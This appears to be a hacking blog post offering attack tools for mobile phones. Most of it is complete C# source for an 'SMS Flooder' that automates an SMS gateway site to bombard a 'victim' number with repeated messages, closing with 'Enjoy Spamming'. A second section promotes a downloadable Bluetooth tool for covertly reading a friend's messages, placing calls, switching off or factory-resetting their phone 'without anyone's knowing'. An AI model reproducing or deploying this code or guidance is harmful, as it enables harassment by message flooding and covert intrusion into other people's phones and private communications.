23:06

mobile hacking

SMS Flooding


HiE FrIeNdS i HaVe SeEn MoRe NuMbEr Of PeOpLe aRe iNtErEsTeD iN SMS Flooding

HeRe i gOt ThE cOdE .... CoNvErT tHe AbOvE cOdE tO *.exe fIlE aNd ThEn We CaN StArT tHe SMS flooding

BeFoRe StArTiNg ThE pRoCeSs We NeEd To ReGiStEr In

Code:
http://www.smstau.com
aNd ThEn U hAvE tO aCtIvAtE bY sImPlY mOdIfYiNg We CaN bE aBlE tO uSe dIfFeReNt WeBsItEs AlSo .

Code:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;

namespace SMS_Flooder
{
    public partial class frmMain : Form
    {
        Random rnd = new Random();
        string chars = "abcdefghijklmnopqrstuvwxyz0123456789";
        string randomData = "";
        string message;

        public frmMain()
        {
            InitializeComponent();

            for (int i = 0; i < 100; i++)
            {
                cbCount.Items.Add(i + 1);
            }
            wb.Navigate("http://www.smstau.com");
        }

        private string GenerateString(int StringLength)
        {
            randomData = "";
            for (int i = 0; i < StringLength; i++)
            {
                randomData = randomData + chars[rnd.Next(0, 36)];
            }
            return randomData;
        }

        private string GetMessage()
        {
            message = "";
            if (rbRandom.Checked == true)
            {
                message = GenerateString(rnd.Next(10, 129)) + Environment.NewLine;
            }
            else if (rbCustom.Checked == true)
            {
                message = tbMsg.Text + Environment.NewLine;
            }
            return message;
        }

        private void rbCustom_CheckedChanged(object sender, EventArgs e)
        {
            tbMsg.Enabled = true;
        }

        private void rbRandom_CheckedChanged(object sender, EventArgs e)
        {
            tbMsg.Enabled = false;
        }

        private void btnFlood_Click(object sender, EventArgs e)
        {
            if (tbVictim.Text.Length < 10)
            {
                MessageBox.Show("Invalid Mobile Number", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
            }
            else if (cbCount.Text == "")
            {
                MessageBox.Show("Select number of times to send sms", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
            }
            else
            {
                string victim = "";
                for (int i = 0; i < Convert.ToInt32(cbCount.Text); i++)
                {
                    victim += tbVictim.Text + ",";
                }
                victim = victim.Remove(victim.Length - 1, 1);

                wb.Document.GetElementById("textfield_m").InnerText = victim;
                wb.Document.GetElementById("comment").InnerText = GetMessage();
                wb.Navigate(lblSend.Text);

                string spammed = "";
                spammed += "Mobile No.:" + tbVictim.Text + Environment.NewLine;
                spammed += "Messages Sent: " + cbCount.Text + Environment.NewLine;
                spammed += "Message: " + tbMsg.Text + Environment.NewLine;
                spammed += Environment.NewLine + "Enjoy Spamming :) :)" + Environment.NewLine;
                MessageBox.Show(spammed, "Flooded", MessageBoxButtons.OK, MessageBoxIcon.Error);
            }
        }

        private void tbVictim_TextChanged(object sender, EventArgs e)
        {
            if (tbVictim.Text.Contains("."))
            {
                tbVictim.Clear();
            }
            try
            {
                double check = Convert.ToDouble(tbVictim.Text);
            }
            catch (Exception)
            {
                tbVictim.Clear();
            }
        }

        private void wb_DocumentCompleted(object sender, WebBrowserDocumentCompletedEventArgs e)
        {
            Text = "SMS Flooder";
            if (wb.Url.AbsolutePath == "/main.php")
            {
                gbFlooder.Enabled = true;
                lblLogged.Visible = true;
                lblTryAgain.Visible = false;
            }
            else
            {
                lblLogged.Visible = false;
                lblTryAgain.Visible = true;
            }
        }

        private void wb_Navigating(object sender, WebBrowserNavigatingEventArgs e)
        {
            Text = "SMS Flooder: Please Wait...";
        }

        private void btnLogin_Click(object sender, EventArgs e)
        {
            wb.Document.GetElementById("username").InnerText = tbLogin.Text;
            wb.Document.GetElementById("password").InnerText = tbPwd.Text;
            wb.Navigate(lblLogin.Text);
        }
    }
}

Source :
Code:
http://www.techole.com/2010/05/sms-flooder.html
Hack your friends mobile


So you want to do any of the following?

    * log into your friends mobile
    * read his messages
    * change his phone settings- read his messages
    * change profile
    * play his ringtone even if phone is on silent
    * play his songs(in his phone)
    * restart the phone
    * switch off the phone
    * restore factory settings
    * change ringing volume
    * call from his phone

Ok so how the hell to do this  Tongue  Ok for starters this is no hack.  It uses bluetooth's existing functionality to access the features being talked about.


Prerequisites:

    * The other phone must be bluetooth enabled(most are these days)
    * The other phone must have bluetooth on(Surprisingly a lot of people always have it on, in spite of the fact that you should never  have it on, it eats you battery. How many people, a BBC panaroma program some time back used this to find out that more than 60% of people have left bluetooth on
    * Unless the other person configured it that way, you do require permission to pair once. So you need to be paired with the other phone once to use this hack next time without anyone's knowing. (Thats why its hack your friends mobile, your friend might have paired you already

Usage:

    * On series 60, install directly
    * If you have a cellphone like series 40 (Nokia 6230) with bluetooth and Java 2 support make .jad file with jad generator (included on package).
    * When connecting devices use a code 0000
    * Before starting the application on smartphones do not forget to turn on bluetooth.

Code:
http://rapidshare.com/files/38882460/Super_Bluetooth_Hack.zip

0 comments: